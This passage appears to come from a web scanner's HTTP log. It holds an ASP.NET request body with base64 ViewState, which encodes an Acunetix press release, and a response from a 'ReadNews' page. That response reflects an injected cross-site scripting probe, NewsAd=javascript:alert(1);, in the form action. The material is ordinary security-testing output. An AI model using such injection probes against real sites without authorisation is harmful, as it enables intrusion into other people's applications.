CAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp%2FUCAuadp%2FUCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl%2BYFAuadl%2BYFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C%2B6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:07:20 GMT
          Content-Length: 30520
          
          
          Response body (30520 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=javascript%3aalert(1)%3b&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0